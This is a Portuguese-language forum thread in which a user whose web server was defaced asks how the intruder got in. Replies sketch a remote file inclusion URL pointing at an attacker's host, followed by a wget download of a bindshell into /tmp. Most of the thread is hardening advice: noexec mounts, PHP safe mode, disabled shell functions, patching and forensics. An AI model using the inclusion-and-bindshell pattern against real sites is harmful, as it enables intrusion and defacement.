Defacement - Fui Invadido !

[Nunes]

Oi Pessoal,

Já vi que o meu final de semana não vai ser muito bom... Cheguei hoje na empresa e sabe o que descobri...
Invadiram o meu servidor Web... Fizeram um Defacement em todas as paginas que eu tinha hospedas aqui...

Meu pedido de ajuda eh o seguinte:
Tenho um IPTABLES de frente, ele faz o Firewall e o Nat todos os por traz dele tenho os demais servidores, inclusive o IIS, rodando num Win2k

Alguem sabe me dizer como esse carinha conseguiu me invadir ?
Quais as possibilidades ? Por onde ele pode ter entrado ?

Sei que estou fufu, pois vou ter que reconstruir todos os meus de novo...

Abraços desesperados a todos e me ajudem...

Obrigado

Nunes

[The-shadow]

é a putalhada do brazil... muitos sacaninhas têm a mania qe são hackers, eles fazem asim

index.php?page=http://site_deles.com.br/comando_pra_executar_no_seu_servicdor.txt
e dps fazem download de uma bindshell

wget bha bha bha pra --> /tmp
ou para /var/tmp

e dps acham giro por o defacment na zone-h.org, enfim, vamos mas é dar-lhes uma sova

uma optima solução é a seguinte, faça as partiçoes "/tmp"
e "/var" separadas, e monte elas no fstab com a flag "noexec" assim o kiddie pode fazer download, escrever apagar dessa partição, mas nc vai consegui executar.

nos seu /etc/php.ini meta ele a correr em safe mode (safe_mode=On). mta gente pode pensar que é tipo o safe mode do windoz, mas n! na verdade é uma maneira de correr o php com mais segurança.
dps n se eskeça de também desabilitar algumas funcçoes do php, tais como
system(), passthru(), shell() shell_exec() etc. (elas podem executar comandos do systema)..

verifiquie nas páginas ospedadas se elas têm esse bug de inclusão de ficheiros remotos, desenvolva algum alogaritmo que só permita o include de ficheiros se estes se encontrarem na direcotria local..

e um bom router sempre ajuda, pois hoje em dia existe o conceito de "reverse shell" que mtos desses kiddies infezlimente já sabem usar. uma boa leitura pelo tutorial do pessoal the hackers choice "Placing backdoors trought firewalls" certamente também irá ajudar a evitar problemas futuros...

espero que a sua semana n seja assim tão ruim
Cumps.

[The-shadow]

ae cara, eskeçi de dizer, chmod 700 wget ... ftp... telnet ...tftp...
vai dificultar mto a vida do kiddie, alias ele n vai ter pachorra e vai desistir, afinal n é um hacker..

[admin77789]

se um hacker verdadeiro entrase , como ele poderia burlar tudo isso no meu servidor amigo ? eu setei isso nos meus hosts tb

[1c3m4n]

Bom cara num eh pq vc tem um iptables na frente que vc esta seguro... num adianta ter iptables se vc tem um apache rodando.. o quero dizer eh q a porta 80 fica aberta e deve mesmo ficar!!!
Tipo o cara deve ter entrado por alguma falha de pacote desatualizado seja do apache ou qq outro....
Antes de vc fazer qq coisa vc deveria ter isolado essa maquina da rede pra poder analisar os logs....

[mistymst]

analise forense ajudaria ai.


amigo pelo visto, assim como voce eh muito outros, se fiam que firewall vai dar 100% de seguranca, ele eh apenas um aditivo a seguranca, nao imunizando NEM UM POUCO a negligencia na manutencao/seguranca dos outros servicos, verifique a intregridade do seu firewall e de outros servicos, e provavelmente foi so o seu servidor de web que levou o farelo, ou melhor, so o SERVICO de web, provavelmente seu servidor esta intacto, de uma olhada na configuracao do seu servidor, faca ele mai seguro, desabilite algumas funcoes...

defacement eh normalmente simples, eu lembro muito bem q a uns trocentos anos o pessoal fazia isso com o frontpage

[GrayFox]

Mantenha todo o sistema atualizado. Frequentemente verifique as novas falhas de seguranca e atualize tudo.
Essa é uma das melhores maneiras de aliviar dores de cabeça futuras.
[]'s

[demiurgo]

# TOPICO HELLRAISER!!!!!!!

# LOCKED